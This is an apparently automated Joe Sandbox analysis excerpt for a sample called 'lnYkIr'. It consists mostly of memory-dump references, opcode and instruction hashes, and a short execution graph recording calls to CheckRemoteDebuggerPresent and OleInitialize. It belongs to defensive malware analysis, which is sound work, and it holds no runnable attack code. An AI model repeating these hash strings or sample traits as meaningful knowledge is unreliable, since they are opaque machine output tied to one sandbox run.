                                                              • Opcode Fuzzy Hash: 81d6a7b92563b368c2f4856ec86bc00f1d45b7fb465c0122ac99dea71543f5e1
                                                              • Instruction Fuzzy Hash: 0221F471500204DFDB05DF58D9C0B96BF65FB98318F20C569D9090F356C33AE496C7A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185117980.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_16cd000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 59fae2bcd499bba05b62f7315c9825cc52ff476994d2c4ae065e73fda68891cb
                                                              • Instruction ID: 4ddfd5d351d26c735ea07dbdcbc4118c33feb844cc2e17bb747f5c68b323b9b4
                                                              • Opcode Fuzzy Hash: 59fae2bcd499bba05b62f7315c9825cc52ff476994d2c4ae065e73fda68891cb
                                                              • Instruction Fuzzy Hash: 5A210071604200DFCB15DF68D980B26BFA5FB88714F20C57DD90A4B396C33AD407CAA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2191150703.000000000A680000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0eb548d43bb255c59010fcbfd9f8f97e53ae70153249b8983c97abc3cb200283
                                                              • Instruction ID: 7c0179c3c5f768a9dccd81b97314ff01c9a4ce912401da79821facf1166f8417
                                                              • Opcode Fuzzy Hash: 0eb548d43bb255c59010fcbfd9f8f97e53ae70153249b8983c97abc3cb200283
                                                              • Instruction Fuzzy Hash: C421EB717043059FCB24DFA9D8907AAB7BEEF84220F19C579C4498F355DB709849CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2191150703.000000000A680000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 681f998b122f8a938de0532bdeda375cf7329946b47694bfbf75711c0bb8b086
                                                              • Instruction ID: b9c463cb37580ac34098e0d4c40073420df373fc39f9bb58fdebe9ad0e795b56
                                                              • Opcode Fuzzy Hash: 681f998b122f8a938de0532bdeda375cf7329946b47694bfbf75711c0bb8b086
                                                              • Instruction Fuzzy Hash: C31190717003059FDB28EAA9D89476AF7EEEF84221F19C53984498B359DB709849CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185029861.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_16bd000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction ID: c9a09bd8c3b81e63c4496f0971def81de00fc297aa2faf4f829b8304225d90db
                                                              • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                              • Instruction Fuzzy Hash: 5D11CD72404240DFDB02CF44D9C4B96BF61FB84324F24C6A9D9090A257C33AE45ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2191150703.000000000A680000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5f241be13f114b050a913891aedafe0a77b4b958052c97498c3d5d462d753187
                                                              • Instruction ID: ff819e232fb5bd214910b9252956bae3391334789347707cc6ebd461130fe436
                                                              • Opcode Fuzzy Hash: 5f241be13f114b050a913891aedafe0a77b4b958052c97498c3d5d462d753187
                                                              • Instruction Fuzzy Hash: E511AB3661A3848FC713ABB8E8148967FB9DF9731074A82DFE4408B363C735880ACB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2191150703.000000000A680000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A680000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_a680000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7726039f856ecb16d8764da17438fb95b18e851f3f8584edf3bc457b11c7cd35
                                                              • Instruction ID: e24b29da587d7977ef6a500e16ac643eadd2d2e4cfbf8ac2d04fd62ea37ac9bb
                                                              • Opcode Fuzzy Hash: 7726039f856ecb16d8764da17438fb95b18e851f3f8584edf3bc457b11c7cd35
                                                              • Instruction Fuzzy Hash: 5B11487550A3849FC7039BACE8148DA7FB4AF46310B0185A7E058DB372D731885ACF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185117980.00000000016CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016CD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_16cd000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: aa851354d4bfa89ab49264aac13a572984d30424768b009a611bcdf5be0f2cdf
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: 5711BE75604280DFDB12CF58D9C4B25BF61FB84714F24C6ADD8494B756C33AD40ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185029861.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_16bd000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 011c018fbb440f0f83d384494fbd4ca457e88bc9baa1b45d953a1c977aed6057
                                                              • Instruction ID: 63ad17a19cf0adb9531cd5623acfb1451c74d2d8c5df3f382f634d43a8965ee7
                                                              • Opcode Fuzzy Hash: 011c018fbb440f0f83d384494fbd4ca457e88bc9baa1b45d953a1c977aed6057
                                                              • Instruction Fuzzy Hash: 4F01A7710053849AE7108AAACDC4BF7BF98EF45328F18C479ED094E296D3799881CBB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.2185029861.00000000016BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 016BD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_16bd000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 54001905740eee26c836abe54790d2ee8d5dde1b5c909a1d1ec4b0a24953fb97
                                                              • Instruction ID: 93ae473aee73f98524705f3510e4b339777e0e922f51981d0e261978c8fddddb
                                                              • Opcode Fuzzy Hash: 54001905740eee26c836abe54790d2ee8d5dde1b5c909a1d1ec4b0a24953fb97
                                                              • Instruction Fuzzy Hash: B0F0C8710043449EE7108A1ACDC4BA3FF98EF41338F18C46AED084E282C3799840CB70
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:4.9%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:16
                                                              Total number of Limit Nodes:2
                                                              execution_graph 23671 69fd878 23672 69fdb80 23671->23672 23673 69fd8a0 23671->23673 23674 69fd8a9 23673->23674 23679 69fcd44 23673->23679 23676 69fdbc3 23678 69fd8cc 23678->23676 23683 69fcd60 23678->23683 23680 69fcd4f 23679->23680 23681 69fdbc3 23680->23681 23682 69fcd60 OleInitialize 23680->23682 23681->23678 23682->23681 23684 69fdbf8 OleInitialize 23683->23684 23685 69fdc5c 23684->23685 23685->23676 23686 13370a8 23687 13370ec CheckRemoteDebuggerPresent 23686->23687 23688 133712e 23687->23688

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 630 13370a0-133712c CheckRemoteDebuggerPresent 633 1337135-1337170 630->633 634 133712e-1337134 630->634 634->633
                                                              APIs
                                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0133711F
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3368108130.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1330000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: CheckDebuggerPresentRemote
                                                              • String ID:
                                                              • API String ID: 3662101638-0
                                                              • Opcode ID: bcf626fff786d874466aa218ef009118032137fa66ab4bbe3100b8daa3e632b4
                                                              • Instruction ID: 0511be6e5aefcdeaded2b6bf4f8a1633d4a0c679241ffd5b0f3397eebf2a0a29
                                                              • Opcode Fuzzy Hash: bcf626fff786d874466aa218ef009118032137fa66ab4bbe3100b8daa3e632b4
                                                              • Instruction Fuzzy Hash: FA2148B1C012598FDB10CFAAD884BEEFBF5AF49310F14845AE459A3250D778A944CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 637 13370a8-133712c CheckRemoteDebuggerPresent 639 1337135-1337170 637->639 640 133712e-1337134 637->640 640->639
                                                              APIs
                                                              • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 0133711F
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3368108130.0000000001330000.00000040.00000800.00020000.00000000.sdmp, Offset: 01330000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_1330000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: CheckDebuggerPresentRemote
                                                              • String ID:
                                                              • API String ID: 3662101638-0
                                                              • Opcode ID: d79fba7d5e92d7d1d66c01b3f11e72f0918bd00f9e4cf2f091d92edd0ac08e77
                                                              • Instruction ID: a4713a49beb16bf5ee71b4aef1bd71df1a9d4e1e489f23aadd98366a187d3742
                                                              • Opcode Fuzzy Hash: d79fba7d5e92d7d1d66c01b3f11e72f0918bd00f9e4cf2f091d92edd0ac08e77
                                                              • Instruction Fuzzy Hash: CE2125B2C012598FDB10CFAAD884BEEFBF5AF49310F14845AE459A3250D778A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 643 69fdbf0-69fdbf7 645 69fdbf8-69fdc5a OleInitialize 643->645 646 69fdc5c-69fdc62 645->646 647 69fdc63-69fdc80 645->647 646->647
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 069FDC4D
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3380733514.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_69f0000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID:
                                                              • API String ID: 2538663250-0
                                                              • Opcode ID: 5dded57d29f12c45f4947e59bf7e0cd99c688d75f0507ccab6094a3479c1a606
                                                              • Instruction ID: a65dc48ebc8f4c1b3feb2ca3e6d5c7595e51041e9573d9ab846a015a98b9392f
                                                              • Opcode Fuzzy Hash: 5dded57d29f12c45f4947e59bf7e0cd99c688d75f0507ccab6094a3479c1a606
                                                              • Instruction Fuzzy Hash: 291103B58003488FDB20DFAAD584BDEBBF8EB48310F248419D519A3200C378A544CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 650 69fcd60-69fdc5a OleInitialize 652 69fdc5c-69fdc62 650->652 653 69fdc63-69fdc80 650->653 652->653
                                                              APIs
                                                              • OleInitialize.OLE32(00000000), ref: 069FDC4D
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3380733514.00000000069F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069F0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_69f0000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID: Initialize
                                                              • String ID:
                                                              • API String ID: 2538663250-0
                                                              • Opcode ID: 534f5022ee12b2ba4221e6d43283b4a4055a3527f7136bd8dcc0b4ba629145d0
                                                              • Instruction ID: ae0a0ce5fe212f5670749ea7b8fae9fda06a0aa83a31e964c7ef690613e03920
                                                              • Opcode Fuzzy Hash: 534f5022ee12b2ba4221e6d43283b4a4055a3527f7136bd8dcc0b4ba629145d0
                                                              • Instruction Fuzzy Hash: FA1103B5C107488FDB20DFAAD584B9EBBF8EB48310F248459D519A7600D378A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3366592470.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_e4d000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 227aef67e4b75393fd007e6d9da89859549b1ed78a681901caa571aa4b31b48b
                                                              • Instruction ID: 370b254f40ec6c050dd91cc67250ce4b0ad68e60715fe7765a28be463201a51e
                                                              • Opcode Fuzzy Hash: 227aef67e4b75393fd007e6d9da89859549b1ed78a681901caa571aa4b31b48b
                                                              • Instruction Fuzzy Hash: A4314B7550D3C49FCB13CB24D990711BF71AB57214F29C5EBD9898F2A3C23A980ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.3366592470.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_e4d000_lnYkIr.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ad525f9e1d4d2aa9520b64e2b964de0d31ec84bd09b03d7d337f554d9ae47dcf
                                                              • Instruction ID: 512076e57a8cc3a82686f3d6fa69b21a885813d050b50e924a0f83281cf1793f
                                                              • Opcode Fuzzy Hash: ad525f9e1d4d2aa9520b64e2b964de0d31ec84bd09b03d7d337f554d9ae47dcf
                                                              • Instruction Fuzzy Hash: 6421F271608204DFCB15DF14ED80B26BBA6FB84318F24C56DE9095B296C37AD846CA62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%